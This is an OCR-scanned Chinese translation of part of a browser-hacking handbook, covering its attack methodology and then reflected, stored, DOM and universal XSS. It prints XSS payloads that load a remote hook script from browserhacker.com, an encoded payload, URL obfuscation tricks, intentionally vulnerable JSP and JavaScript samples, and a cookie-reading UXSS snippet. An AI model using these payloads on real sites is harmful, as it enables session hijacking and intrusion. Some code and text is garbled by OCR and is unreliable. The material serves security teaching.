这 是 为 什么 呢 ? 因为 这 个 方法 在 攻击 的 每 一 步 都 用 得 着 ， 是 其 他 攻击 阶段 必须 绕 过 和 利用 的 安 
全 措施 。 

另 一 个 同样 比较 明显 的 地 方 就 是 攻击 方法 中 心 位 置 的 循环 箭头 。 倒 不 是 说 一 定 会 循环 起 来 ， 
重要 的 是 其 中 一 个 环节 的 成 功 攻击 ， 很 可 能 成 为 另 一 个 环节 成 功 攻击 的 先兆 。 从 这 个 意义 上 说 ， 
这 个 阶段 应 该 经 常 权衡 利 浆 ， 什 么 方法 最 有 效 ， 回 报 最 丰厚 ， 就 采用 什么 方法 。 

这 里 给 出 了 七 种 可 以 对 浏览 器 发 起 的 核心 攻击 方法 。 至 于 到 底 应 该 采取 哪 种 方法 , 要 根据 很 
多 因素 来 决定 。 最 主要 的 有 渗透 的 范围 、 期 望 的 目标 以 及 被 害 浏览 器 的 能 力 。 

1. 绕 过 同 源 策略 

可 以 把 SOP 看 成 浏览 器 的 一 个 重要 沙 箱 。 如 果 你 能 绕 过 它 ， 那 只 要 访问 之 前 被 浏览 器 封 死 的 
另 一 个 来 源 ， 即 可 自动 地 成 功 实现 攻击 。 绕 过 SOP， 就 可 以 使 用 后 续 一 系列 可 用 的 攻击 方法 对 新 
出 现 的 来 源 进行 攻击 。 

关于 SOP 的 深入 解释 将 在 第 4 章 进行 。 只 要 你 绕 过 它 ， 就 可 以 进行 多 种 攻击 ， 又 不 会 发 生 干 
扰 。 第 4 章 将 介绍 一 些 矛 盾 点 ， 以 及 如 何 利用 浏览 器 基本 安全 组 件 中 的 这 些 漏洞 。 

2. 攻击 用 户 

浏览 器 黑客 方法 中 的 第 一 个 选项 是 攻击 用 户 ， 有 具体 将 在 第 $ 章 讨论 。 这 一 章 涵盖 涉及 浏览 
用 户 的 攻击 技术 ， 以 及 他 们 对 攻击 者 所 控制 环境 的 潜在 信任 。 
使 用 浏览 器 提供 的 手段 ， 以 及 你 控制 页 面 的 能 力 ， 可 以 创造 一 个 受 控 的 环境 , 让 用 户 输入 敏 
感 信息 ， 以 便 捕获 和 利用 。 

可 以 给 用 户 布 下 陷阱 ， 让 他 们 在 不 知 不 觉 中 让 渡 权限 ,并 触发 其 他 操作 ， 比 如 运行 任意 程序 
或 者 授权 访问 本 地 资源 。 可 以 生成 隐藏 的 对 话 框 和 透明 的 框架 , 或 者 控制 鼠标 事件 以 辅助 实现 以 
上 目的 ， 向 用 户 展示 一 个 假象 以 掩盖 用 户 界面 的 真实 功能 。 

3. 攻击 浏览 器 

攻击 浏览 器 就 是 直接 攻击 浏览 器 的 核心 。 第 6 章 会 带 你 探索 指纹 方法 和 全 面 利用 。 

浏览 器 是 一 个 巨大 的 攻击 面 , 它 有 着 众多 API 和 各 种 存储 和 取得 数据 的 抽象 机 制 。 毫 不 奇怪 ， 
浏览 器 很 多 年 来 一 直 被 自身 这 样 或 那样 的 隐患 所 困扰 。 更 加 令 人 惊讶 的 是 , 浏览 器 开发 人 员 每 次 
解决 问题 都 做 得 不 赖 。 

4. 攻击 扩展 

如 果 你 攻击 核心 浏览 器 失败 了 ， 那 就 等 于 正门 关闭 了 。 此 时 ,可 以 考虑 攻击 它 所 安装 的 外 部 
程序 ( 可 能 会 很 多 )。 

相关 内 容 会 在 第 7 章 介绍 ， 主 题 就 是 攻击 扩展 。 这 一 章 将 讨论 扩展 变 体 及 特殊 扩展 实现 。 
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你 会 看 到 很 多 种 扩展 的 隐患 ， 利 用 这 些 隐患 ， 可 以 实现 跨 域 请 求 ， 甚 至 执行 操作 命令 。 

5. 攻击 插件 

插件 一 直 是 浏览 器 隐患 多 发 区 。 插 件 与 扩展 不 同 , 它 属 于 第 三 方 组 件 ， 由 它 服务 的 网 页 独立 
初始 化 ( 而 非 一 直 整 合 到 浏览 器 中 )。 

攻击 插件 的 方法 将 在 第 8 章 介 绍 ， 包 括 攻 击 Java 和 Flash 等 普遍 存在 的 插件 。 相 关内 容 还 有 如 
何 检 测 浏览 器 安装 了 哪些 插件 ， 了 解 该 领域 的 研究 者 已 经 发 现 了 哪些 可 以 利用 的 弱点 , 以 及 哪些 
旨 在 保护 插件 安全 的 手段 被 滥用 因而 可 以 绕 过 ， 等 等 。 

6. 攻击 Web 应 用 

浏览 器 就 是 为 了 使 用 Web 而 生 的 ， 因 此 攻击 Web 应 用 就 是 自然 而 然 的 了 。 这 个 话题 包括 使 用 
浏览 器 的 标准 功能 攻击 Web 应 用 ， 将 在 第 9 章 详细 介绍 。 

想象 一 下 , 很 多 组 织 的 内 部 网 都 可 以 访问 大 量 应 用 。 如 果 另 一 个 标签 页 中 的 外 部 网 站 能 访问 
这 些 内 部 应 用 会 怎么 样 ? 你 会 发 现 受到 防火 墙 保护 的 内 部 应 用 在 外 部 攻击 面前 居然 形同虚设 。 

7. 攻击 网 络 

你 会 发 现 居然 有 浏览 器 连接 到 了 非 标准 的 端口 , 而 且 这 种 情况 相当 普遍 。 很 多 服务 器 安装 的 
应 用 都 随意 指定 端口 ， 而 互联 网 上 的 有 些 网 站 甚至 不 使 用 80 和 443 端 口 发 布 内 容 。 

如 果 浏 览 器 根本 没有 连接 服务 器 怎么 办 呢 ? 如 果 浏 览 器 连接 到 了 一 个 目的 完全 不 同 而 且 还 
使 用 了 完全 不 同 协 议 的 服务 呢 ?” 这 种 情况 不 会 违反 SOP， 而 且 在 多 数 情况 下 ， 从 浏览 器 安全 控件 
角度 看 都 是 合法 的 。 改 变 这 些 浏览 器 的 行为 可 以 达到 深度 攻击 的 目的 。 

攻击 网 络 的 方法 会 涉及 OSI 网 络 模 型 的 底层 。 第 10 章 将 讲解 这 些 技 术 ， 一视同仁 地 将 它们 应 
用 到 攻击 任意 TCP/IP 网 络 。 



















































































1.6 小结 


毫 无 疑问 ,浏览 器 是 21 世 纪 这 十 多 年 来 最 重要 的 一 种 软件 。 软 件 厂 商 很 少 为 自己 的 应 用 开 
发 定制 的 客户 端 软件 ， 更 多 的 是 使 用 Web 技 术 开 发 一 个 应 用 界面 : 不 仅仅 是 传统 的 在 线 Web 应 
用 ， 还 包含 部 署 在 局 域 网 内 的 本 地 应 用 。 在 服务 器 -客户 端 模型 中 ， 浏 览 锅 占据 着 不 可 动 播 的 
统治 地 位 。 

浏览 器 在 几乎 所 有 类 型 的 网 络 应 用 中 都 有 一 席 之 地 ,虽然 很 多 组 织 试图 禁用 它 , 但 这 个 愿望 
只 是 个 泡影 。 任 何 组 织 都 不 可 能 放弃 浏览 器 ， 唯 一 的 选择 是 在 自己 的 网 络 中 使 用 它 。 

黑客 攻击 浏览 器 通常 会 伪装 成 非 恶 意 的 服务 器 , 向 浏览 器 发 送 有 效 的 通信 请 求 。 多 数 情况 下 ， 
浏览 器 不 会 知晓 自己 正 与 一 个 骗子 服务 器 通信 ,因此 就 会 执行 骗子 服务 顺 发 来 的 所 有 指令 ,而 且 
还 以 为 自己 在 防火 墙 的 保护 下 万 无 一 失 呢 。 

接 下 来 的 几 章 将 重点 介绍 浏览 器 攻防 的 方法 ， 教 给 大 家 如 何 利用 浏览 器 及 其 可 以 访问 的 


设备 。 
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1.7 问题 


(1) 浏览 器 中 的 DOM 都 有 哪些 功能 ? 

(2) 为 什么 说 一 个 安全 的 浏览 需 抵 得 过 全 副 武装 的 安全 措施 ? 
(3) 说 说 JavaScript 和 VBScript 有 哪些 不 同 。 

(4) 说 出 服务 器 可 能 降低 浏览 器 安全 性 的 三 种 方式 。 

(5) 什么 是 浏览 器 的 攻击 面 ? 

(6) 描述 一 下 你 理解 的 沙 箱 。 

(7) 浏览 器 在 使 用 HTTPS 通 信 时 ， 代 理 可 以 看 到 通信 内 容 吗 ? 
(8) 说 出 三 个 与 安全 相关 的 HTTP 首 部 。 

(9) 为 什么 安全 专家 不 认可 健壮 性 法 则 ? 

(10) 只 有 I 斑 有 ， 而 其 他 现代 浏览 器 没有 的 脚本 语言 是 什么 ? 
要 查看 问题 答案 ， 请 访问 本 书 网 站 https://browserhacker.com/answers ， 或 者 Wiley 的 网 站 






































http:/www.wiley.com/go/browserhackershandbook。 
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攻击 浏览 需 的 第 一 步 就 是 获得 目标 浏览 器 的 控制 权 。 这 就 像 一 只 脚 路 进门 槛 一 样 。 虽 然 在 实 
现 最 终 的 目标 之 前 , 还 需要 完成 很 多 前 期 步骤 , 但 这 重要 的 第 一 步 却 是 任何 情况 下 都 避免 不 了 的 。 
这 一 步 是 攻击 浏览 需 方法 体系 中 的 初始 控制 阶段 。 

浏览 需 每 执行 一 次 来 自 服务 器 的 指令 , 就 会 向 你 敞开 一 扇 门 , 让 你 有 机 会 取得 对 它 的 控制 权 。 
为 了 执行 服务 器 返回 的 代码 ， 浏 览 器 必须 承担 一 定 的 风险 。 此 时 ， 你 必须 制造 一 种 情境 ， 让 浏览 
器 运行 你 写 的 代码 。 做 到 这 一 点 ， 才 有 机 会 进一步 利用 浏览 器 的 功能 。 

初始 控制 阶段 可 能 会 碰 到 各 种 各 样 的 情况 。 你 可 以 用 很 多 方法 执行 自己 的 指令 , 有 的 方法 可 
能 相当 容易 ,而 有 的 则 可 能 需要 多 投入 一 些 时间 和 精力 。 要 获得 控制 权 , 最 显而易见 的 方式 就 是 
让 目标 浏览 占 打 开 你 的 Web 应 用 。 

对 于 本 章 要 讨论 的 技术 ，Web 应 用 安全 测试 人 员 必 须 给 予 重 视 并 且 要 透彻 理解 。 习 
中 很 多 都 是 大 家 熟悉 的 ， 或 者 说 是 在 安全 社区 中 被 老生 常 谈 的 。 

在 浏览 器 能 够 执行 你 的 指令 之 后 , 还 必须 明白 自己 不 能 做 什么 。 下 面 我 们 先 从 第 一 阶段 开始 ， 
看 看 如 何 获得 初始 控制 。 


2.4 理解 控制 初始 化 


获得 初始 控制 权 的 第 一 步 ， 就 是 寻找 机 会 对 目标 施加 某 种 程度 的 影响 。 为 此 ， 就 要 执行 你 设 
计 好 的 初始 化 指令 ,把 初始 化 指令 安插 进 目 标 浏 览 器 ,就 是 初始 化 控制 和 攻击 浏览 器 的 首要 任务 。 

代码 的 形式 有 很 多 。 比 如 ，JavaScript、HTML 、CSS 或 其 他 浏览 器 能 理解 的 代码 ， 都 可 以 成 
为 初始 控制 的 工具 。 有 时 候 , 初 始 代 码 的 逻辑 甚至 可 以 封装 在 字 节 码 文件 中 , 比如 一 个 恶意 的 SWF 
文件 ( Adobe Flash 文 件 格式 )。 

采用 什么 技术 实现 对 目标 的 控制 ,很 大 程度 上 取决 于 攻击 的 环境 。 如 果 使 用 了 被 盗用 的 站 点 ， 
那么 可 以 通过 顺路 下 载 来 做 。 可 是 ， 如 果 你 想 要 采用 钓鱼 式 攻 击 ， 那么 XSS 可 能 是 最 好 的 选择 。 
而 如 果 你 是 在 一 间 咖 啡 店 , 那么 网 络 攻击 起 怕 最 合适 。 随 后 几 节 , 我 们 会 逐一 探讨 这 些 攻击 方法 。 
本 章 ， 我 们 会 接触 一 个 术语 ， 叫 勾 连 ( hook )。 匀 连 浏览 器 始 于 执行 初始 代码 ， 然 后 是 维护 
通信 渠道 (下 一 章 再 介绍 )。 当 然 ， 首 先 要 让 你 宝贵 的 代码 进入 目标 浏览 
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2.2 ”实现 初始 控制 


获得 目标 浏览 带 控 制 权 的 方式 实在 太 多 了 。 这 得 益 于 互联 网 用 户 、 现 代 浏 览 费 复杂 性 、 动 态 
可 执行 语言 以 及 可 信 模 型 混乱 程度 的 爆炸 式 增长 。 

本 章 接 下 来 主要 讨论 各 种 初始 控制 方法 , 但 这 绝对 不 是 全 部 。 浏览 絮 的 快速 发 展 一 定 会 不 断 
为 你 提供 新 的 选择 。 


2.2.1 使 用 XSS 攻击 


1995 年 ， 在 网 景 公 司 给 其 Navigator 浏 览 器 中 引入 JavaScript 之 前 ，Web 内 容 大 多 数 是 静态 的 
HTMIL:。 如 果 网 站 想 改变 内 容 ， 必 须 由 用 户 点 击 链接 ， 向 服务 器 发 送 一 个 新 的 HTTP 请 求 并 等 待 
服务 器 响应 。 于 是 就 导致 了 动态 语言 的 诞生 。 

接着 ,JavaScript 就 问世 了 。 就 在 浏览 器 支持 动态 语言 后 不 久 , 第 一 批 恶意 代码 注入 的 案例 也 
随 之 出 现 。 

最 早 的 报告 来 自 卡 内 基 梅 隆 大 学 计算 机 紧急 回应 小 组 协调 中 心 ( Computer Emergency 
Response Team Coordination Center, CERT/CC )， 时 间 是 2000 年 2 月 。CERT Advisory CA-2000-02? 
记载 了 因 玻 忽而 意外 包含 的 恶意 HTML 标 签 和 脚本 ， 以 及 由 于 这 些 恶 意 代码 的 执行 ,用 户 会 受到 
什么 影响 。 亚 意 行 为 最 早 的 形式 包括 : 

O cookie € zx ( cookie poisoning ) 
口 暴露 敏感 信息 

Q 违背 基于 来 源 的 安全 规则 

Q 算 改 Web 表 单 

口 暴露 SSL 加 密 的 内 容 

最 初 的 报告 把 这 种 攻击 摘 述 为 通过 情况 下 的 “路 站 点 ”脚本 执行 ， 最 终 则 被 称 为 Cross-site 
Scripting， 简 写成 CSS。 为 了 避免 与 简写 形式 相同 的 Cascading Style Sheets ( 层 县 样式 表 ) IRR, 
安全 行业 遂 改 称 其 为 XSS;。 随 着 时 间 推 移 ,， XSS 已 发 展 成 为 使 用 非常 广泛 的 一 种 攻击 手段 , 因为 
网 页 代码 中 的 隐患 确实 太 多 了 o 

一 般 来 说 ， 在 不 可 信 的 内 容 被 处 理 ， 然 后 又 被 当成 可 信任 内 容 在 浏览 絮 中 泻 染 后 ,XSS 就 出 
现 了 。 如 果 这 个 内 容 里 包含 HTML 、JavaScript、VBScript 或 其 他 动态 内 容 ， 浏 览 器 就 有 可 能 执行 
不 可 信和 的 代码 。 

举 个 例子 , 假如 谷歌 应 用 商店 存在 XSS 可 以 利用 的 隐患 ， 那 么 攻击 者 就 可 以 欺骗 用 户 安装 恶 
意 Chrome 扩 展 。 实 际 上 ，Jon Oberheide 在 2011 年 就 演示 过 这 种 情况 。Oberheide 演 示 的 对 安 午 Web 
市 场 中 XSS 隐 上 患 的 利用 ， 曾 经 禾 动 一 时 。 如 果 坏 人 利用 这 个 隐患 ， 那 么 受害 人 的 设备 将 被 安装 上 
任意 应 用 ， 并 且 授 权 应 用 访问 相应 设备 的 任意 权限 “。 

XSS 分 很 多 种 类 , 但 宽泛 地 说 ， 它 们 可 能 会 影响 浏览 器 和 服务 器 中 的 任何 一 个 。 很 早 就 有 的 
反射 型 XSS( Reflected XSS ) 和 持久 型 XSS( Persistent XSS ) 是 利用 服务 器 端 隐患 的 , 而 DOM XSS 





































































































2.2 ”实现 初始 控制 25 











和 通用 XSS (Universal XSS， 也 叫 UXSS ) 利用 的 则 是 客户 端的 缺陷 。 

当然 , 也 存在 服务 器 端 和 客户 端 都 有 缺陷 和 隐患 的 情况 。 这 时 候 , 单方 面 可 能 没有 安全 问题 ， 
但 两 个 方面 结合 起 来 ， 就 有 可 能 为 XSS 提 供 可 乘 之 机 。 

与 其 他 安全 领域 类 似 , 随 着 我 们 介绍 的 攻击 方法 越 来 越 多 , 混合 使 用 各 种 方法 的 情况 也 会 增 
多 ,但 考虑 到 尊重 历史 和 全 面 了 解 的 学 习 宗 旨 , 本 书 会 使 用 以 下 比较 传统 和 宽泛 的 XSS 分 类 方式 。 

1. 反射 型 XSS 

反射 型 XSS 是 最 常见 的 XSS， 其 过 程 是 不 可 信用 户 数 据 被 提交 到 一 个 Web 应 用 ， 然 后 该 数据 
立即 在 响应 中 被 返回 , 也 就 是 说 在 页 面 中 反射 回 了 不 可 信和 内 容 。 由 于 浏览 器 看 到 的 是 服务 器 端 代 
码 ， 所 以 就 相信 它 是 安全 的 ， 于 是 就 会 执行 它 。 

与 多 数 XSS 一 样 ， 反 射 型 XSS 受 同 源 策略 的 限制 。 这 种 情况 下 的 隐患 在 服务 器 端 代码 中 。 下 
面 是 一 个 存在 隐患 的 JSP 代 码 的 例子 : 


<% String userId = request.getParameter("user"); %> 
Your User ID is <%= userId %> 


这 行 代码 接收 用 户 查 询 参 数 并 将 参数 内 容 直 接 在 响应 中 返回 。 利用 这 种 隐患 很 简单 ,只 要 在 
浏览 器 地 址 栏 内 输入 以 下 地 址 : http://browservictim.com/userhome.jsp?user= <iframe%20src=http:// 
browserhacker.com/></iframe>。 执行 后 ,就 会 在 页 面 中 插入 一 个 地 址 为 browserhacker.com 的 框架 。 

同样 ， 要 向 浏览 器 中 注入 远程 JavaScript 肢 本， 只 需 欺 骗 目 标 访问 以 下 地 址 : http:// 
browservictim.com/userhome.jsp?user=<script%20src=http://browserhacker.com/hook.js></script>. Web 
应 用 在 处 理 这 个 URL 时 ， 就 会 在 HTML 中 返回 相应 的 <script> 块 。 浏 览 需 在 接收 到 响应 后 ， 看 到 
其 中 包含 指向 远程 JavaScript 的 <script> 块 ， 就 会 在 被 攻击 来 源 的 上 下 文中 执行 该 脚本 。 

本 章 后 面 还 会 介绍 ， 要 成 功利 用 这 种 Web 应 用 的 缺陷 ， 需 要 配合 某 种 程度 的 社会 工程 手段 。 
比如 ， 需 要 提供 一 个 短 网 址 或 者 模糊 后 的 URL， 或 者 采用 其 他 方法 欺骗 用 户 访 问 你 编造 的 URL。 


模糊 URL 的 方法 如 下 : 

口 缩短 URL 

口 重 定向 URL 

口 采用 URL 编 码 或 ASCII 编 码 来 编码 URL 

O 添加 一 些 多 余 的 、 无 关 的 查询 参数 ， 把 恶意 内 容 放 在 中 间或 后 面 
O 在 URL 中 使 用 @ 符 号 以 添加 伪 域 名 内 容 

口 把 主机 名 转换 为 整数 ， 比 如 http:/3409677458 
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现实 中 的 反射 型 XSS 


现实 当中 的 反射 型 XSS 利 用 案例 实在 太 多 了 ,我 们 在 这 里 挂 一 漏 万 地 只 列 出 几 个 比较 突出 
的 例子 。 

口 Ramneek Sidhu 的 “Reflected XSS vulnerability affects millions of sites hosted in HostMonster” 
( http://www.ehackingnews.com/2013/01/reflected-xss-hostmonster.html ) 
HostMonster 的 主机 服务 对 所 有 托管 的 网 站 都 默认 提供 了 一 个 HTTP 404 错 误 页 面 。 不 幸 
的 是 ， 这 个 错误 页 面 有 一 个 显示 广告 的 函数 ,被 XSS 攻 击 者 发 现 可 以 利用 。 而 攻击 用 的 
代码 对 HostMonster 托 管 的 每 个 网 站 都 适用 。 

口 XSSed 的 “F-Secure, McAfee and Symantec websites again XSSed" ( http://www.xssed.com/ 
news/130/F-Secure McAfee and Symantec websites again XSSed/ ) 
XSSed 是 一 个 报告 XSS 缺 陷 的 流行 网 站 ， 发 表 过 一 篇 汇总 主流 安全 厂商 发 现 的 反射 型 
XSS 隐 患 的 文章 。 这 些 厂商 有 F-Secure、MCcAfee 和 Symantec。 

口 Michael Sutton 的 “Mobile App Wall of Shame: ESPN ScoreCenter” ( http://research.zscaler. 
com/2013/01/mobile-app-wall-of-shameespn.html ) 


XSS 缺 陷 不 一 定 只 存在 于 标准 的 浏览 器 。ZScaler 研 究 人 员 Michael Sutton 发 现 了 一 个 移 
动 网 站 的 XSS 缺 陷 ， 而 这 个 移动 网 站 主要 是 通过 iPhone 应 用 中 WebView 控 制 器 来 泻 染 
的 。 太 多 的 应 用 开发 者 会 利用 谈 入 的 Web 框 架 在 自己 的 应 用 中 显示 信息 。 不 管 网 站 是 在 
哪里 泻 染 (在 桌面 浏览 器 或 iPhone 应 用 中 )， 都 会 造成 可 利用 的 XSS 缺 陷 。 


= 
+t 


2. 存储 型 XSS 

存储 型 (或 持久 型 ) XSS 与 反射 型 XSS 类 似 ， 区 别 在 于 存储 型 XSS 会 持久 保存 于 Web 应 用 的 
数据 存储 中 。 随后 , 只 要 是 在 脚本 被 持久 存储 后 访问 被 侵入 网 站 的 浏览 带 ,都 会 执行 该 恶意 代码 。 
对 攻击 者 来 说 ， 这 种 XSS 是 比较 有 吸引 力 的 ， 因 为 不 必 每 次 都 笋 费 苦心 地 设计 链接 或 者 采用 社会 
工程 手段 ， 相 对 一 劳 永 逸 了 ， 结 果 则 是 比较 容易 被 滥用 。 






















































































这 种 攻击 通常 会 利用 后 端 数据 库 来 保存 恶意 代码 ， 但 有 时 候 也 可 能 会 使 用 日 志文 件 。 假 如 
Web 应 用 记录 日 志 的 程序 没有 防御 XSS 的 能 力 ， 而 查看 这 些 日 志 都 要 使 用 基于 Web 的 GUI， 那 把 




















恶意 代码 保存 于 日 志 就 是 一 种 途径 。 
任何 查看 这 些 日 志 的 人 ， 都 会 无 意 间 在 自己 的 浏览 器 中 泻 染 并 运行 恶意 代码 。 此 外 , 由 于 通 
常 只 有 管理 员 有 权限 查询 日 志 ， 因 此 这 些 恶 意 代码 往往 能 够 执行 敏感 或 危险 的 操作 。 
在 上 一 节 中 反射 型 XSS 示 例 的 基础 上 ,假设 应 用 也 要 把 用 户 的 显示 名 称 保存 起 来 。 比 如 : 


9. 
<5 






































String userDisplayName = request.getParameter("userdisplayname"); 
String userSession = session.getAttribute('userid'); 

String mena = "INSERT INTO users (userDisplayName) VALUES(?) WHERE 
userId = ?"; 

breparedstat cnent statement = connection.prepareStatement (dbQuery) ; 
statement.setString(1, userDisplayName) ; 

statement.setString(2, userSession); 
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statement.executeUpdate(); 
$- 


假设 在 应 用 中 的 某 个 地 方 ， 有 代码 会 提取 最 后 登录 用 户 的 列表 : 


<% 
Statement statement = connection.createStatement(); 
ResultSet result = 

statement .executeQuery ("SELECT * FROM users LIMIT 10"); 
S> 
The top 10 latest users to sign up:<br /> 














<% while(result.next()) { %> 
User: <%=result.getString("userDisplayName") ><br /> 
<% } S> 


那么 利用 这 个 漏洞 ( 比如 访问 这 个 链接 : http://browservictim.com/newuser, been gn 
=<script%20src=http://browserhacker.com/hook.js></script> )， 就 能 让 作为 攻击 者 的 你 威力 倍增 。 
是 因为 你 不 是 每 次 只 欺骗 一 个 用 户 ， 而 是 一 劳 永 逸 地 让 后 续 所 有 访问 者 都 运行 恶意 
代码 ， 如 果 不 把 恶意 代码 去 掉 ， 攻 击 会 一 直 持 续 下 去 。 


以 下 举 几 个 现实 中 的 存储 型 XSS 的 例子 。 
口 Ben Hayak 的 “Google Mail Hacking - Gmail Stored XSS — 2012! ”( http://www.benhayak. 
uo RE M T tun aU UM -xss.html ) 
ius 了 Gmail 存在 的 持久 型 XSS 缺 陷 。 这 个 缺陷 出 现在 谷歌 为 Gmail 增加 的 一 项 新 
功能 ET, 这 项 新 功能 是 让 用 户 在 Gmail 中 包含 Google+ 朋 友 的 信息 。 如 果 你 在 Google+ 个 
信息 中 包含 了 一 段 恶 意 JavaScript，( 某 些 情况 下 ) 你 的 朋友 就 可 能 在 他 的 Gmail 中 执 
的 代码 。 
口 XSSed 的 “AnothereBay permanent XSS” ( http://www.xssed.com/news/131/Another Ebay 
permanent XSS/) 
eBay 同样 有 很 多 Web 隐 患 。 一 位 名 叫 Shubham Upadhyay 的 安全 研究 人 员 发 现 ， 可 以 在 
eBay 添加 包含 额外 JavaScript 代 码 的 新 列表 。 这 意味 着 没有 警惕 性 的 用 户 如 果 查 看 相应 
列表 ， 就 会 在 https://ebay.com 来 源 下 执行 其 中 的 JavaScript ( 持久 型 XSS )。 























3. DOM XSS 

DOM XSS 是 一 种 纯粹 的 客户 端 XSS 类 型 ， 不 依赖 Web 应 用 处 理 用 户 输入 时 的 漏洞 。 与 反射 
型 和 存储 型 XSS 相 比 ，DOM XSS 的 不 同 之 处 在 于 只 利用 客户 端 代码 ( 比如 JavaScript ) 中 存在 的 
缺陷 。 
想象 一 种 场景 。 某 组 织 想 包含 一 个 参数 用 于 设置 欢迎 消息 。 但 是 ,这 个 功能 没有 添加 到 服务 
器 端 , 而 是 放 到 了 客户 端 代码 中 。 这 段 代码 会 根据 URL 中 的 内 容 动 态 修改 页 面 , 使 用 的 代码 如 下 : 
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document .write(document.location.href.substr ( 
document .location.href.search ( 
/#welcomemessage/i)+16,document.location.href.length) ) 


这 上段 代码 会 收集 URL 的 #welcomemessage=x 参 数 之 后 的 文本 ， 其 中 x 可 能 包含 任意 字符 ， 

终 要 写 到 当前 网 页 的 文档 中 。 比如, 使 用 下 面 的 URL, http://browservictim.com/ homepage.html# 
Sees e=Hiya， 在 JavaScript 执 行 之 后 ， 就 会 在 页 面 主体 中 插入 文本 'Hiya'。 

那么 包含 恶意 代码 的 URL 就 可 以 是 http://browservictim.com/homepage.html#welcomemessage 
=<script>document.location='http://browserhacker.com'</script> 。 这 样 就 会 把 JavaScript 脚 本 插入 
DOM, Sij 62s S E In] Slhttp://browserhacker.com 

因为 代码 只 在 客户 端 执行 ， 所 以 如 果 不 出 问题 ，DOM XSS 攻 击 对 服务 需 通 常 是 不 可 见 的 。 
只 要 使 用 片段 标识 符 (# 号 后 面 的 字符 )， 就 可 以 通过 浏览 器 向 Web 应 用 发 送 (正常 情况 下 ) 不 可 
能 发 送 的 数据 。 

在 攻击 字符 串 位 于 # 号 后 面 的 数据 中 时 ， 恶 意 数 据 是 依存 于 浏览 器 的 。 用 防 
火 墙 作为 防御 控制 的 应 用 来 说 ， 这 种 方法 是 有 效 的 。 此 时 ， 请 求 的 恶意 部 分 可 能 永远 不 会 被 Web 
应 用 的 防火 墙 发 现 。 

另 一 种 可 能 被 利用 的 隐患 的 代码 如 下 所 示 : 


function getId(id) { 
console.log('id: ' + id); 

































































var url = window.location.href; 

var pos = url.indexOf ("id=")4+3; 

var len = url.length; 

var id = url.substring(pos,len); 
eval('getId(' + id.toString() + ')'); 


恶意 代码 注入 ig 参 数 , 就 可 以 利用 以 上 代码 。 在 这 个 例子 中 , 假设 你 想 注 入 一 个 加 载 和 执 
行 远 程 JavaScript 文 件 的 指令 ， 就 可 以 使 用 下 面 这 个 DOM XSS 攻 击 : 


http://browservictim. com/page.html?id-1');s-document.createElement('script');s. 
src-'http://browserhacker.com/hook.js';document.getElementsByTagName('head')[0] 
appendChild(s);// 


有 读者 可 能 已 经 猜 到 了 ， 上 面 这 行 代码 不 会 真正 执行 ， 因 为 其 中 的 单 引 号 字符 会 导致 调用 
eval () 时 出 错 。 为 此 ， 可 以 使 用 JavaScript 的 String.fromcharcode () 方 法 封装 这 行 代 码 ， 得 
到 的 URL 类 似 如 下 所 示 : 


http: //browservictim.com/page.html?id=1');eval (String. fromCharCode(115, 
61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,10 
97 LOT TTO 1d 6,40; 397 1157 99. TTA, POS TT T6307 AT 59;-TT15,:46,115,114 99:6. 
£39,104) 716; 11:6; 1125.58.47, 47 -98, 114, TTT,TI9,T15,;101,114;104,97,99,107,10 
1 20474 6,99: TT TOS AY, 204 11d, VT. 107 A610 6, 115,39, 59, 100; 111, 99, TT7., T: 
09,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,9 
7,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,10 
1,110,100,67,104,105,108,100,40,115,41,59))// 
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这 个 例子 展示 了 利用 这 种 XSS 时 的 一 个 有 意思 的 问题 。 这 种 利用 形式 的 前 提 就 是 必须 在 神 不 
知 鬼 不 觉 的 情况 下 进行 。 对 于 前 面 的 例子 ,欺骗 用 户 执 行 恶 意 URL 的 方式 有 很 多 ， 比 如 通过 电子 
邮件 、 社 交 网 络 的 状态 更 新 ， 或 者 通过 即时 消息 。 

通常 ， 这 些 URL 都 会 使 用 http://bit.ly 或 http://goo.gl 等 短 网 址 服务 缩短 ， 以 达到 隐藏 真实 意图 
的 目的 。2.2.4 节 还 会 再 深入 探讨 这 种 攻击 方法 。 


以 下 是 现实 中 的 几 个 DOM XSS 的 例子 。 

ū Stefano Di Paola 的 “DOM XSS on Google Plus One Button" (http://blog.mindedsecurity. 
com/2012/11/dom-xss-on-google-plus-one-button.html ) 
Stefano DiPaola 发 现 了 谷歌 +1 按 钮 JavaScript 中 的 一 个 CORS 的 缺陷 。 利 用 这 个 缺陷 可 以 
在 Google 的 来 源 下 执行 指令 。 

口 Shahin Ramezany “Yahoo Mail DOM-XSS” ( http://abysssec.com/files/Yahoo! DOM- 
SDAY.pdf ) 
雅虎 一 个 不 幸 的 用 于 广告 的 子 域 使 用 了 过 时 的 JavaScript， 其 中 暴露 出 了 一 个 DOM XSS 
缺陷 。 虽 然 第 三 方 脚 本 已 经 更 新 解决 了 对 eval () 调用 未 加 保护 的 问题 ， 但 在 研究 这 个 
问题 的 时 候 ， 雅 虎 仍然 使 用 了 存在 隐患 的 脚本 。 



























































4. 通用 型 XSS 
通用 型 XSS 是 另 一 种 在 浏览 器 中 执行 恶意 JavaScript 的 方法 。 某 些 情 况 下 , 这 种 方法 甚至 可 以 
不 受 SOP 制 约 。 


现实 当中 的 通用 型 XSS 

以 下 是 一 个 现实 当中 非常 有 意思 的 通用 型 XSS 的 例子 。 

2009 年 ，Roi Saltzman 发 现 了 配合 使 用 Chrome 的 ChromeHTML UREL 处 理 程序 ， 让 JE 加 载 任 
意 URI 的 漏洞 。 




















var sneaky = 'setTimeout ("alert (document.cookie);", 4000); 
document .location.assign("http://www.gmail.com");'; 
document.location = 


'chromehtml:"80%20javascript:document .write(sneaky)"' 


在 合适 的 条 件 下 ， 攻 击 者 就 可 以 在 几乎 任何 源 的 名 义 下 对 目标 发 动 攻击 5。 比 如 ， 前 面 的 
JavaScript 会 将 当前 位 置 设置 为 一 个 Chrome 框 架 ， 然 后 在 Gmail 加 载 之 后 会 延迟 执行 一 段 脚 本 。 











实际 应 用 中 , 这 种 攻击 一 般 会 更 进一步 ， 除了 利用 浏览 器 本 身 的 缺陷 , 还 可 能 利用 其 扩展 和 
插件 的 缺陷 。 第 7 章 将 更 详细 地 介绍 相关 内 容 。 

5. XSS 病 毒 

2005 年 ，Wade Alcorm 的 一 份 研究 “, 展示 了 将 恶意 XSS 代 码 以 病毒 方式 传播 的 可 能 性 。 在 Web 
